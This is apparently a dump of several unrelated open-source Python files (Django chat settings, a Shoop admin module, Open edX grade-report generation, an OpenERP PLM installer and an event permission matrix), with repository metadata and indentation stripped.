USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
DRAGON_URL = 'http://localhost:9999/'
SWAMP_DRAGON_REDIS_HOST = 'redis'
ACCOUNT_AUTHENTICATION_METHOD = "email"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USERNAME_REQUIRED = False
# SwampDragon settings
SWAMP_DRAGON_CONNECTION = ('chatroom.connection.notification_connection.ChatConnection', '/data')
#SWAMP_DRAGON_CONNECTION = ('swampdragon_notifications.notification_connection.Connection', '/data')
SWAMP_DRAGON_HEARTBEAT_ENABLED = True
SWAMP_DRAGON_HEARTBEAT_FREQUENCY = 1000 * 60 * 5 # Five minutes
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_FILTER_BACKENDS': ('rest_framework.filters.DjangoFilterBackend',),
}
if True:
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
|
bufke/chat-experiment
|
chat/settings.py
|
Python
|
agpl-3.0
| 3,651
|
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from shoop.admin.base import AdminModule, MenuEntry
from shoop.admin.utils.urls import derive_model_url, get_edit_and_list_urls
from shoop.core.models import Manufacturer
class ManufacturerModule(AdminModule):
name = _("Manufacturers")
breadcrumbs_menu_entry = MenuEntry(name, url="shoop_admin:manufacturers.list")
def get_urls(self):
return get_edit_and_list_urls(
url_prefix="^Manufacturers",
view_template="shoop.admin.modules.manufacturers.views.Manufacturer%sView",
name_template="manufacturers.%s"
)
def get_menu_entries(self, request):
category = _("Products")
return [
MenuEntry(
text=_("Manufacturers"),
icon="fa fa-building",
url="shoop_admin:manufacturers.list",
category=category
),
]
def get_model_url(self, object, kind):
return derive_model_url(Manufacturer, "shoop_admin:manufacturers", object, kind)
|
akx/shoop
|
shoop/admin/modules/manufacturers/__init__.py
|
Python
|
agpl-3.0
| 1,356
|
"""
Functionality for generating grade reports.
"""
from __future__ import absolute_import
import logging
import re
from collections import OrderedDict, defaultdict
from datetime import datetime
from itertools import chain
from time import time
import six
from django.conf import settings
from django.contrib.auth import get_user_model
from lazy import lazy
from opaque_keys.edx.keys import UsageKey
from pytz import UTC
from six import text_type
from six.moves import zip, zip_longest
from course_blocks.api import get_course_blocks
from courseware.courses import get_course_by_id
from courseware.user_state_client import DjangoXBlockUserStateClient
from instructor_analytics.basic import list_problem_responses
from instructor_analytics.csvs import format_dictlist
from lms.djangoapps.certificates.models import CertificateWhitelist, GeneratedCertificate, certificate_info_for_user
from lms.djangoapps.grades.api import CourseGradeFactory
from lms.djangoapps.grades.api import context as grades_context
from lms.djangoapps.grades.api import prefetch_course_and_subsection_grades
from lms.djangoapps.teams.models import CourseTeamMembership
from lms.djangoapps.verify_student.services import IDVerificationService
from openedx.core.djangoapps.content.block_structure.api import get_course_in_cache
from openedx.core.djangoapps.course_groups.cohorts import bulk_cache_cohorts, get_cohort, is_course_cohorted
from openedx.core.djangoapps.user_api.course_tag.api import BulkCourseTags
from openedx.core.djangoapps.waffle_utils import WaffleSwitchNamespace
from student.models import CourseEnrollment
from student.roles import BulkRoleCache
from xmodule.modulestore.django import modulestore
from xmodule.partitions.partitions_service import PartitionService
from xmodule.split_test_module import get_split_user_partitions
from .runner import TaskProgress
from .utils import upload_csv_to_report_store
WAFFLE_NAMESPACE = 'instructor_task'
WAFFLE_SWITCHES = WaffleSwitchNamespace(name=WAFFLE_NAMESPACE)
OPTIMIZE_GET_LEARNERS_FOR_COURSE = 'optimize_get_learners_for_course'
TASK_LOG = logging.getLogger('edx.celery.task')
ENROLLED_IN_COURSE = 'enrolled'
NOT_ENROLLED_IN_COURSE = 'unenrolled'
def _user_enrollment_status(user, course_id):
"""
Returns the enrollment activation status in the given course
for the given user.
"""
enrollment_is_active = CourseEnrollment.enrollment_mode_for_user(user, course_id)[1]
if enrollment_is_active:
return ENROLLED_IN_COURSE
return NOT_ENROLLED_IN_COURSE
def _flatten(iterable):
return list(chain.from_iterable(iterable))
class _CourseGradeReportContext(object):
"""
Internal class that provides a common context to use for a single grade
report. When a report is parallelized across multiple processes,
elements of this context are serialized and parsed across process
boundaries.
"""
def __init__(self, _xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
self.task_info_string = (
u'Task: {task_id}, '
u'InstructorTask ID: {entry_id}, '
u'Course: {course_id}, '
u'Input: {task_input}'
).format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input,
)
self.action_name = action_name
self.course_id = course_id
self.task_progress = TaskProgress(self.action_name, total=None, start_time=time())
@lazy
def course(self):
return get_course_by_id(self.course_id)
@lazy
def course_structure(self):
return get_course_in_cache(self.course_id)
@lazy
def course_experiments(self):
return get_split_user_partitions(self.course.user_partitions)
@lazy
def teams_enabled(self):
return self.course.teams_enabled
@lazy
def cohorts_enabled(self):
return is_course_cohorted(self.course_id)
@lazy
def graded_assignments(self):
"""
Returns an OrderedDict that maps an assignment type to a dict of
subsection-headers and average-header.
"""
grading_cxt = grades_context.grading_context(self.course, self.course_structure)
graded_assignments_map = OrderedDict()
for assignment_type_name, subsection_infos in six.iteritems(grading_cxt['all_graded_subsections_by_type']):
graded_subsections_map = OrderedDict()
for subsection_index, subsection_info in enumerate(subsection_infos, start=1):
subsection = subsection_info['subsection_block']
header_name = u"{assignment_type} {subsection_index}: {subsection_name}".format(
assignment_type=assignment_type_name,
subsection_index=subsection_index,
subsection_name=subsection.display_name,
)
graded_subsections_map[subsection.location] = header_name
average_header = u"{assignment_type}".format(assignment_type=assignment_type_name)
# Use separate subsection and average columns only if
# there's more than one subsection.
separate_subsection_avg_headers = len(subsection_infos) > 1
if separate_subsection_avg_headers:
average_header += u" (Avg)"
graded_assignments_map[assignment_type_name] = {
'subsection_headers': graded_subsections_map,
'average_header': average_header,
'separate_subsection_avg_headers': separate_subsection_avg_headers,
'grader': grading_cxt['subsection_type_graders'].get(assignment_type_name),
}
return graded_assignments_map
def update_status(self, message):
"""
Updates the status on the celery task to the given message.
Also logs the update.
"""
TASK_LOG.info(u'%s, Task type: %s, %s', self.task_info_string, self.action_name, message)
return self.task_progress.update_task_state(extra_meta={'step': message})
class _CertificateBulkContext(object):
def __init__(self, context, users):
certificate_whitelist = CertificateWhitelist.objects.filter(course_id=context.course_id, whitelist=True)
self.whitelisted_user_ids = [entry.user_id for entry in certificate_whitelist]
self.certificates_by_user = {
certificate.user.id: certificate
for certificate in
GeneratedCertificate.objects.filter(course_id=context.course_id, user__in=users)
}
class _TeamBulkContext(object):
def __init__(self, context, users):
self.enabled = context.teams_enabled
if self.enabled:
self.teams_by_user = {
membership.user.id: membership.team.name
for membership in
CourseTeamMembership.objects.filter(team__course_id=context.course_id, user__in=users)
}
else:
self.teams_by_user = {}
class _EnrollmentBulkContext(object):
def __init__(self, context, users):
CourseEnrollment.bulk_fetch_enrollment_states(users, context.course_id)
self.verified_users = set(IDVerificationService.get_verified_user_ids(users))
class _CourseGradeBulkContext(object):
def __init__(self, context, users):
self.certs = _CertificateBulkContext(context, users)
self.teams = _TeamBulkContext(context, users)
self.enrollments = _EnrollmentBulkContext(context, users)
bulk_cache_cohorts(context.course_id, users)
BulkRoleCache.prefetch(users)
prefetch_course_and_subsection_grades(context.course_id, users)
BulkCourseTags.prefetch(context.course_id, users)
class CourseGradeReport(object):
"""
Class to encapsulate functionality related to generating Grade Reports.
"""
# Batch size for chunking the list of enrollees in the course.
USER_BATCH_SIZE = 100
@classmethod
def generate(cls, _xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
Public method to generate a grade report.
"""
with modulestore().bulk_operations(course_id):
context = _CourseGradeReportContext(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name)
return CourseGradeReport()._generate(context)
def _generate(self, context):
"""
Internal method for generating a grade report for the given context.
"""
context.update_status(u'Starting grades')
success_headers = self._success_headers(context)
error_headers = self._error_headers()
batched_rows = self._batched_rows(context)
context.update_status(u'Compiling grades')
success_rows, error_rows = self._compile(context, batched_rows)
context.update_status(u'Uploading grades')
self._upload(context, success_headers, success_rows, error_headers, error_rows)
return context.update_status(u'Completed grades')
def _success_headers(self, context):
"""
Returns a list of all applicable column headers for this grade report.
"""
return (
["Student ID", "Email", "Username"] +
self._grades_header(context) +
(['Cohort Name'] if context.cohorts_enabled else []) +
[u'Experiment Group ({})'.format(partition.name) for partition in context.course_experiments] +
(['Team Name'] if context.teams_enabled else []) +
['Enrollment Track', 'Verification Status'] +
['Certificate Eligible', 'Certificate Delivered', 'Certificate Type'] +
['Enrollment Status']
)
def _error_headers(self):
"""
Returns a list of error headers for this grade report.
"""
return ["Student ID", "Username", "Error"]
def _batched_rows(self, context):
"""
A generator of batches of (success_rows, error_rows) for this report.
"""
for users in self._batch_users(context):
users = [u for u in users if u is not None]
yield self._rows_for_users(context, users)
def _compile(self, context, batched_rows):
"""
Compiles and returns the complete list of (success_rows, error_rows) for
the given batched_rows and context.
"""
# partition and chain successes and errors
success_rows, error_rows = zip(*batched_rows)
success_rows = list(chain(*success_rows))
error_rows = list(chain(*error_rows))
# update metrics on task status
context.task_progress.succeeded = len(success_rows)
context.task_progress.failed = len(error_rows)
context.task_progress.attempted = context.task_progress.succeeded + context.task_progress.failed
context.task_progress.total = context.task_progress.attempted
return success_rows, error_rows
def _upload(self, context, success_headers, success_rows, error_headers, error_rows):
"""
Creates and uploads a CSV for the given headers and rows.
"""
date = datetime.now(UTC)
upload_csv_to_report_store([success_headers] + success_rows, 'grade_report', context.course_id, date)
if len(error_rows) > 0:
error_rows = [error_headers] + error_rows
upload_csv_to_report_store(error_rows, 'grade_report_err', context.course_id, date)
def _grades_header(self, context):
"""
Returns the applicable grades-related headers for this report.
"""
graded_assignments = context.graded_assignments
grades_header = ["Grade"]
for assignment_info in six.itervalues(graded_assignments):
if assignment_info['separate_subsection_avg_headers']:
grades_header.extend(six.itervalues(assignment_info['subsection_headers']))
grades_header.append(assignment_info['average_header'])
return grades_header
def _batch_users(self, context):
"""
Returns a generator of batches of users.
"""
def grouper(iterable, chunk_size=self.USER_BATCH_SIZE, fillvalue=None):
args = [iter(iterable)] * chunk_size
return zip_longest(*args, fillvalue=fillvalue)
def users_for_course(course_id):
"""
Get all the enrolled users in a course.
This method fetches & loads the enrolled user objects at once which may cause
out-of-memory errors in large courses. This method will be removed when
`OPTIMIZE_GET_LEARNERS_FOR_COURSE` waffle flag is removed.
"""
users = CourseEnrollment.objects.users_enrolled_in(course_id, include_inactive=True)
users = users.select_related('profile')
return grouper(users)
def users_for_course_v2(course_id):
"""
Get all the enrolled users in a course chunk by chunk.
This generator method fetches & loads the enrolled user objects on demand which in chunk
size defined. This method is a workaround to avoid out-of-memory errors.
"""
filter_kwargs = {
'courseenrollment__course_id': course_id,
}
user_ids_list = get_user_model().objects.filter(**filter_kwargs).values_list('id', flat=True).order_by('id')
user_chunks = grouper(user_ids_list)
for user_ids in user_chunks:
user_ids = [user_id for user_id in user_ids if user_id is not None]
min_id = min(user_ids)
max_id = max(user_ids)
users = get_user_model().objects.filter(
id__gte=min_id,
id__lte=max_id,
**filter_kwargs
).select_related('profile')
yield users
task_log_message = u'{}, Task type: {}'.format(context.task_info_string, context.action_name)
if WAFFLE_SWITCHES.is_enabled(OPTIMIZE_GET_LEARNERS_FOR_COURSE):
TASK_LOG.info(u'%s, Creating Course Grade with optimization', task_log_message)
return users_for_course_v2(context.course_id)
TASK_LOG.info(u'%s, Creating Course Grade without optimization', task_log_message)
batch_users = users_for_course(context.course_id)
return batch_users
def _user_grades(self, course_grade, context):
"""
Returns a list of grade results for the given course_grade corresponding
to the headers for this report.
"""
grade_results = []
for _, assignment_info in six.iteritems(context.graded_assignments):
subsection_grades, subsection_grades_results = self._user_subsection_grades(
course_grade,
assignment_info['subsection_headers'],
)
grade_results.extend(subsection_grades_results)
assignment_average = self._user_assignment_average(course_grade, subsection_grades, assignment_info)
if assignment_average is not None:
grade_results.append([assignment_average])
return [course_grade.percent] + _flatten(grade_results)
def _user_subsection_grades(self, course_grade, subsection_headers):
"""
Returns a list of grade results for the given course_grade corresponding
to the headers for this report.
"""
subsection_grades = []
grade_results = []
for subsection_location in subsection_headers:
subsection_grade = course_grade.subsection_grade(subsection_location)
if subsection_grade.attempted_graded:
grade_result = subsection_grade.percent_graded
else:
grade_result = u'Not Attempted'
grade_results.append([grade_result])
subsection_grades.append(subsection_grade)
return subsection_grades, grade_results
def _user_assignment_average(self, course_grade, subsection_grades, assignment_info):
if assignment_info['separate_subsection_avg_headers']:
if assignment_info['grader']:
if course_grade.attempted:
subsection_breakdown = [
{'percent': subsection_grade.percent_graded}
for subsection_grade in subsection_grades
]
assignment_average, _ = assignment_info['grader'].total_with_drops(subsection_breakdown)
else:
assignment_average = 0.0
return assignment_average
def _user_cohort_group_names(self, user, context):
"""
Returns a list of names of cohort groups in which the given user
belongs.
"""
cohort_group_names = []
if context.cohorts_enabled:
group = get_cohort(user, context.course_id, assign=False, use_cached=True)
cohort_group_names.append(group.name if group else '')
return cohort_group_names
def _user_experiment_group_names(self, user, context):
"""
Returns a list of names of course experiments in which the given user
belongs.
"""
experiment_group_names = []
for partition in context.course_experiments:
group = PartitionService(context.course_id).get_group(user, partition, assign=False)
experiment_group_names.append(group.name if group else '')
return experiment_group_names
def _user_team_names(self, user, bulk_teams):
"""
Returns a list of names of teams in which the given user belongs.
"""
team_names = []
if bulk_teams.enabled:
team_names = [bulk_teams.teams_by_user.get(user.id, '')]
return team_names
def _user_verification_mode(self, user, context, bulk_enrollments):
"""
Returns a list of enrollment-mode and verification-status for the
given user.
"""
enrollment_mode = CourseEnrollment.enrollment_mode_for_user(user, context.course_id)[0]
verification_status = IDVerificationService.verification_status_for_user(
user,
enrollment_mode,
user_is_verified=user.id in bulk_enrollments.verified_users,
)
return [enrollment_mode, verification_status]
def _user_certificate_info(self, user, context, course_grade, bulk_certs):
"""
Returns the course certification information for the given user.
"""
is_whitelisted = user.id in bulk_certs.whitelisted_user_ids
certificate_info = certificate_info_for_user(
user,
context.course_id,
course_grade.letter_grade,
is_whitelisted,
bulk_certs.certificates_by_user.get(user.id),
)
TASK_LOG.info(
u'Student certificate eligibility: %s '
u'(user=%s, course_id=%s, grade_percent=%s letter_grade=%s gradecutoffs=%s, allow_certificate=%s, '
u'is_whitelisted=%s)',
certificate_info[0],
user,
context.course_id,
course_grade.percent,
course_grade.letter_grade,
context.course.grade_cutoffs,
user.profile.allow_certificate,
is_whitelisted,
)
return certificate_info
def _rows_for_users(self, context, users):
"""
Returns a list of rows for the given users for this report.
"""
with modulestore().bulk_operations(context.course_id):
bulk_context = _CourseGradeBulkContext(context, users)
success_rows, error_rows = [], []
for user, course_grade, error in CourseGradeFactory().iter(
users,
course=context.course,
collected_block_structure=context.course_structure,
course_key=context.course_id,
):
if not course_grade:
# An empty gradeset means we failed to grade a student.
error_rows.append([user.id, user.username, text_type(error)])
else:
success_rows.append(
[user.id, user.email, user.username] +
self._user_grades(course_grade, context) +
self._user_cohort_group_names(user, context) +
self._user_experiment_group_names(user, context) +
self._user_team_names(user, bulk_context.teams) +
self._user_verification_mode(user, context, bulk_context.enrollments) +
self._user_certificate_info(user, context, course_grade, bulk_context.certs) +
[_user_enrollment_status(user, context.course_id)]
)
return success_rows, error_rows
class ProblemGradeReport(object):
@classmethod
def generate(cls, _xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
Generate a CSV containing all students' problem grades within a given
`course_id`.
"""
start_time = time()
start_date = datetime.now(UTC)
status_interval = 100
enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id, include_inactive=True)
task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
# This struct encapsulates both the display names of each static item in the
# header row as values as well as the django User field names of those items
# as the keys. It is structured in this way to keep the values related.
header_row = OrderedDict([('id', 'Student ID'), ('email', 'Email'), ('username', 'Username')])
course = get_course_by_id(course_id)
graded_scorable_blocks = cls._graded_scorable_blocks_to_header(course)
# Just generate the static fields for now.
rows = [
list(header_row.values()) + ['Enrollment Status', 'Grade'] + _flatten(list(graded_scorable_blocks.values()))
]
error_rows = [list(header_row.values()) + ['error_msg']]
current_step = {'step': 'Calculating Grades'}
# Bulk fetch and cache enrollment states so we can efficiently determine
# whether each user is currently enrolled in the course.
CourseEnrollment.bulk_fetch_enrollment_states(enrolled_students, course_id)
for student, course_grade, error in CourseGradeFactory().iter(enrolled_students, course):
student_fields = [getattr(student, field_name) for field_name in header_row]
task_progress.attempted += 1
if not course_grade:
err_msg = text_type(error)
# There was an error grading this student.
if not err_msg:
err_msg = u'Unknown error'
error_rows.append(student_fields + [err_msg])
task_progress.failed += 1
continue
enrollment_status = _user_enrollment_status(student, course_id)
earned_possible_values = []
for block_location in graded_scorable_blocks:
try:
problem_score = course_grade.problem_scores[block_location]
except KeyError:
earned_possible_values.append([u'Not Available', u'Not Available'])
else:
if problem_score.first_attempted:
earned_possible_values.append([problem_score.earned, problem_score.possible])
else:
earned_possible_values.append([u'Not Attempted', problem_score.possible])
rows.append(student_fields + [enrollment_status, course_grade.percent] + _flatten(earned_possible_values))
task_progress.succeeded += 1
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload if any students have been successfully graded
if len(rows) > 1:
upload_csv_to_report_store(rows, 'problem_grade_report', course_id, start_date)
# If there are any error rows, write them out as well
if len(error_rows) > 1:
upload_csv_to_report_store(error_rows, 'problem_grade_report_err', course_id, start_date)
return task_progress.update_task_state(extra_meta={'step': 'Uploading CSV'})
@classmethod
def _graded_scorable_blocks_to_header(cls, course):
"""
Returns an OrderedDict that maps a scorable block's id to its
headers in the final report.
"""
scorable_blocks_map = OrderedDict()
grading_context = grades_context.grading_context_for_course(course)
for assignment_type_name, subsection_infos in six.iteritems(grading_context['all_graded_subsections_by_type']):
for subsection_index, subsection_info in enumerate(subsection_infos, start=1):
for scorable_block in subsection_info['scored_descendants']:
header_name = (
u"{assignment_type} {subsection_index}: "
u"{subsection_name} - {scorable_block_name}"
).format(
scorable_block_name=scorable_block.display_name,
assignment_type=assignment_type_name,
subsection_index=subsection_index,
subsection_name=subsection_info['subsection_block'].display_name,
)
scorable_blocks_map[scorable_block.location] = [header_name + " (Earned)",
header_name + " (Possible)"]
return scorable_blocks_map
class ProblemResponses(object):
@classmethod
def _build_problem_list(cls, course_blocks, root, path=None):
"""
Generate a tuple of display names, block location paths and block keys
for all problem blocks under the ``root`` block.
Arguments:
course_blocks (BlockStructureBlockData): Block structure for a course.
root (UsageKey): This block and its children will be used to generate
the problem list
path (List[str]): The list of display names for the parent of root block
Yields:
Tuple[str, List[str], UsageKey]: tuple of a block's display name, path, and
usage key
"""
name = course_blocks.get_xblock_field(root, 'display_name') or root.category
if path is None:
path = [name]
yield name, path, root
for block in course_blocks.get_children(root):
name = course_blocks.get_xblock_field(block, 'display_name') or block.category
for result in cls._build_problem_list(course_blocks, block, path + [name]):
yield result
@classmethod
def _build_student_data(cls, user_id, course_key, usage_key_str):
"""
Generate a list of problem responses for all problem under the
``problem_location`` root.
Arguments:
user_id (int): The user id for the user generating the report
course_key (CourseKey): The ``CourseKey`` for the course whose report
is being generated
usage_key_str (str): The generated report will include this
block and it child blocks.
Returns:
Tuple[List[Dict], List[str]]: Returns a list of dictionaries
containing the student data which will be included in the
final csv, and the features/keys to include in that CSV.
"""
usage_key = UsageKey.from_string(usage_key_str).map_into_course(course_key)
user = get_user_model().objects.get(pk=user_id)
course_blocks = get_course_blocks(user, usage_key)
student_data = []
max_count = settings.FEATURES.get('MAX_PROBLEM_RESPONSES_COUNT')
store = modulestore()
user_state_client = DjangoXBlockUserStateClient()
student_data_keys = set()
with store.bulk_operations(course_key):
for title, path, block_key in cls._build_problem_list(course_blocks, usage_key):
# Chapter and sequential blocks are filtered out since they include state
# which isn't useful for this report.
if block_key.block_type in ('sequential', 'chapter'):
continue
block = store.get_item(block_key)
generated_report_data = defaultdict(list)
# Blocks can implement the generate_report_data method to provide their own
# human-readable formatting for user state.
if hasattr(block, 'generate_report_data'):
try:
user_state_iterator = user_state_client.iter_all_for_block(block_key)
for username, state in block.generate_report_data(user_state_iterator, max_count):
generated_report_data[username].append(state)
except NotImplementedError:
pass
responses = []
for response in list_problem_responses(course_key, block_key, max_count):
response['title'] = title
# A human-readable location for the current block
response['location'] = ' > '.join(path)
# A machine-friendly location for the current block
response['block_key'] = str(block_key)
# A block that has a single state per user can contain multiple responses
# within the same state.
user_states = generated_report_data.get(response['username'], [])
if user_states:
# For each response in the block, copy over the basic data like the
# title, location, block_key and state, and add in the responses
for user_state in user_states:
user_response = response.copy()
user_response.update(user_state)
student_data_keys = student_data_keys.union(list(user_state.keys()))
responses.append(user_response)
else:
responses.append(response)
student_data += responses
if max_count is not None:
max_count -= len(responses)
if max_count <= 0:
break
# Keep the keys in a useful order, starting with username, title and location,
# then the columns returned by the xblock report generator in sorted order and
# finally end with the more machine friendly block_key and state.
student_data_keys_list = (
['username', 'title', 'location'] +
sorted(student_data_keys) +
['block_key', 'state']
)
return student_data, student_data_keys_list
@classmethod
def generate(cls, _xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing
all student answers to a given problem, and store using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
num_reports = 1
task_progress = TaskProgress(action_name, num_reports, start_time)
current_step = {'step': 'Calculating students answers to problem'}
task_progress.update_task_state(extra_meta=current_step)
problem_location = task_input.get('problem_location')
# Compute result table and format it
student_data, student_data_keys = cls._build_student_data(
user_id=task_input.get('user_id'),
course_key=course_id,
usage_key_str=problem_location
)
for data in student_data:
for key in student_data_keys:
data.setdefault(key, '')
header, rows = format_dictlist(student_data, student_data_keys)
task_progress.attempted = task_progress.succeeded = len(rows)
task_progress.skipped = task_progress.total - task_progress.attempted
rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
problem_location = re.sub(r'[:/]', '_', problem_location)
csv_name = 'student_state_from_{}'.format(problem_location)
report_name = upload_csv_to_report_store(rows, csv_name, course_id, start_date)
current_step = {'step': 'CSV uploaded', 'report_name': report_name}
return task_progress.update_task_state(extra_meta=current_step)
|
jolyonb/edx-platform
|
lms/djangoapps/instructor_task/tasks_helper/grades.py
|
Python
|
agpl-3.0
| 33,207
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
import base64
import difflib
from openerp.osv import osv, fields
from openerp.tools.translate import config
import openerp.addons as addons
class plm_installer(osv.osv_memory):
_name='plm.installer'
_inherit='res.config.installer'
__logger = logging.getLogger(_name)
def default_get(self, cr, uid, fields, context=None):
data=super(plm_installer, self).default_get(cr, uid, fields, context)
data['exe_file']='http://sourceforge.net/projects/openerpplm/files/Client/OdooPlm(x64).exe/download'
return data
_columns={
'name':fields.char('File name', size=34),
'exe_name':fields.char('File name', size=128),
'plm':fields.boolean('Odoo PLM Plug-in', help="Product Life-Cycle Management Module."),
'exe_file':fields.char('Odoo PLM File download', size=128, readonly=True, help="Product Life-Cycle Management Client file. Save this file and install this application."),
'description':fields.text('Description', readonly=True)
}
_defaults={
'plm' : False,
'name' : 'OdooPlm.exe',
'description' : """
To complete your installation follow these notes :
* Configure Odoo access capabilty adding Users to the group 'PLM / Integration' before to use Clients.
* Download the Odoo PLM Client file.
* Follow these steps to install Product Life-Cycle Management Client.
1. Double click on Odoo PLM Client file.
2. Select language.
3. Select the directory where to install integrations.
4. Select the editor that has to be connected.
* At editor startup Odoo PLM menu and toolbar will be automatically loaded.
* At first time execution :
1. Click on Login button.
2. Insert data connection.
"""
}
plm_installer()
|
vnsofthe/odoo-dev
|
addons/plm/installer.py
|
Python
|
agpl-3.0
| 2,871
|
from .models import Event, EventAdminRoles, Job, Helper
# This is the central file that defines and manages the different permissions for events, jobs and users.
# Global permissions like creating events, users or sending newsletters are managed in the accounts app.
# There are different roles, defined in registration.models.EventAdminRoles
# In the views, a certain access is requested.
ACCESS_INVOLVED = "ACCESS_INVOLVED" # basically just the main page (user is somehow involved, necessary for all roles)
ACCESS_EVENT_EDIT = "ACCESS_EVENT_EDIT" # edit/archive/delete the event
ACCESS_EVENT_EDIT_LINKS = "ACCESS_EVENT_EDIT_LINKS" # edit links of an event
ACCESS_EVENT_EDIT_JOBS = "ACCESS_EVENT_EDIT_JOBS" # add/delete/duplicate/sort jobs
ACCESS_EVENT_EXPORT_HELPERS = "ACCESS_EVENT_EXPORT_HELPERS" # export data as pdf/excel
ACCESS_EVENT_EDIT_DUPLICATES = "ACCESS_EVENT_EDIT_DUPLICATES" # manage duplicated helpers
ACCESS_EVENT_VIEW_COORDINATORS = "ACCESS_EVENT_VIEW_COORDINATORS" # view the contact details of coordinators
ACCESS_EVENT_VIEW_AUDITLOGS = "ACCESS_EVENT_VIEW_AUDITLOGS" # view audit logs of the event
ACCESS_JOB_EDIT = "ACCESS_JOB_EDIT" # edit an existing job
ACCESS_JOB_EDIT_HELPERS = "ACCESS_JOB_EDIT_HELPERS" # add/remove helpers of job
ACCESS_JOB_VIEW_HELPERS = "ACCESS_JOB_VIEW_HELPERS" # view helpers of job
ACCESS_JOB_SEND_MAILS = "ACCESS_JOB_SEND_MAILS" # send mails for job
ACCESS_JOB_VIEW_MAILS = "ACCESS_JOB_VIEW_MAILS" # view sent mails for job
ACCESS_JOB_VIEW_STATISTICS = "ACCESS_JOB_VIEW_STATISTICS" # view statistics for job (currently for t-shirts)
ACCESS_HELPER_EDIT = "ACCESS_HELPER_EDIT" # edit the personal data of a helper
ACCESS_HELPER_VIEW = "ACCESS_HELPER_VIEW" # view the personal data of a helper
ACCESS_HELPER_INTERNAL_COMMENT_EDIT = "ACCESS_HELPER_INTERNAL_COMMENT_EDIT" # edit the internal comment of a helper
ACCESS_HELPER_INTERNAL_COMMENT_VIEW = "ACCESS_HELPER_INTERNAL_COMMENT_VIEW" # view the internal comment of a helper
ACCESS_HELPER_RESEND = "ACCESS_HELPER_RESEND" # resend the confirmation mail to a helper
ACCESS_INVENTORY_EDIT = "ACCESS_INVENTORY_EDIT" # edit inventory settings for an event
ACCESS_INVENTORY_HANDLE = "ACCESS_INVENTORY_HANDLE" # register and take back inventory
ACCESS_BADGES_EDIT = "ACCESS_BADGES_EDIT" # edit badge settings for an event
ACCESS_BADGES_EDIT_HELPER = "ACCESS_BADGES_EDIT_HELPER" # edit badges of single helpers
ACCESS_BADGES_EDIT_SPECIAL = "ACCESS_BADGES_EDIT_SPECIAL" # edit special badges (=badges without helpers)
ACCESS_BADGES_GENERATE = "ACCESS_BADGES_GENERATE" # generate and register badges
ACCESS_MAILS_SEND = "ACCESS_MAILS_SEND" # can send all mails of an event
ACCESS_MAILS_VIEW = "ACCESS_MAILS_VIEW" # can view all mails of an event
ACCESS_STATISTICS_VIEW = "ACCESS_STATISTICS_VIEW" # can view statistics
ACCESS_GIFTS_EDIT = "ACCESS_GIFTS_EDIT" # edit gift settings for an event
ACCESS_GIFTS_HANDLE_GIFTS = "ACCESS_GIFTS_HANDLE_GIFTS" # give gifts to helpers
ACCESS_GIFTS_HANDLE_PRESENCE = "ACCESS_GIFTS_HANDLE_PRESENCE" # change presence of helpers
ACCESS_GIFTS_VIEW_SUMMARY = "ACCESS_GIFTS_VIEW_SUMMARY" # view summary of gift data (collected deposit, missing shirts)
ACCESS_PREREQUISITES_EDIT = "ACCESS_PREREQUISITES_EDIT" # edit prerequisite settings for an event
ACCESS_PREREQUISITES_VIEW = "ACCESS_PREREQUISITES_VIEW" # view global lists which helper fulfils which prerequisites
ACCESS_PREREQUISITES_HANDLE = "ACCESS_PREREQUISITES_HANDLE" # set for helpers whether they fulfil prerequisites
ACCESS_CORONA_EDIT = "ACCESS_CORONA_EDIT" # edit corona settings for an event
ACCESS_CORONA_VIEW = "ACCESS_CORONA_VIEW" # view contact tracing data for an event
# Based on requested access and role, we can decide whether we grant access or not.
# Here, for each access type, the allowed/required roles are listed.
_rbac_matrix = {
ACCESS_INVOLVED: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
EventAdminRoles.ROLE_INVENTORY,
EventAdminRoles.ROLE_BADGES,
],
ACCESS_EVENT_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_EVENT_EDIT_LINKS: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_EVENT_EDIT_JOBS: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_EVENT_EXPORT_HELPERS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
